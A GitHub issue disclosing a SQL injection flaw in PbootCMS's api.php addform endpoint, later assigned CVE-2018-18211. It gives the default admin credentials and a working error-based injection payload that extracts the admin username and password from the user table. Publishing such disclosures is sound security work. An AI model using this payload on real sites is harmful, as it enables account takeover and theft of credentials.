New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pbootcms SQL injection in api.php #1

Open
hackd0g opened this Issue Oct 8, 2018 · 2 comments

Comments

Projects
None yet
2 participants
@hackd0g

hackd0g commented Oct 8, 2018

The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql

Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code.
URL:https://www.pbootcms.com/freeasn.html
default

This SQL injection requires background api functionality.

default

http://127.0.0.1/Pbootcms-master/admin.php
username=admin
password=123456

When the api function is enabled in the background, the foreground api will have SQL injection.

http://127.0.0.1/PbootCMS-V1.2.1/api.php/cms/addform?fcode=1
POST:contacts[content`) VALUES ( updatexml(1,concat(0x7e,(SELECT//distinct//concat(0x23,username,0x3a,password,0x23)//FROM//ay_user//limit//0,1),0x7e),1) );-- a] = 111 & mobile=13112344321 & content=123

We can get the admin account name and password
default

@hackd0g

This comment has been minimized.

Show comment
Hide comment
@hackd0g

hackd0g Oct 8, 2018

Github filtered **, if you have any questions, you can view the image exp

hackd0g commented Oct 8, 2018

Github filtered **, if you have any questions, you can view the image exp

@fgeek

This comment has been minimized.

Show comment
Hide comment
@fgeek

fgeek commented Oct 13, 2018

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18211 has been assigned for this vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment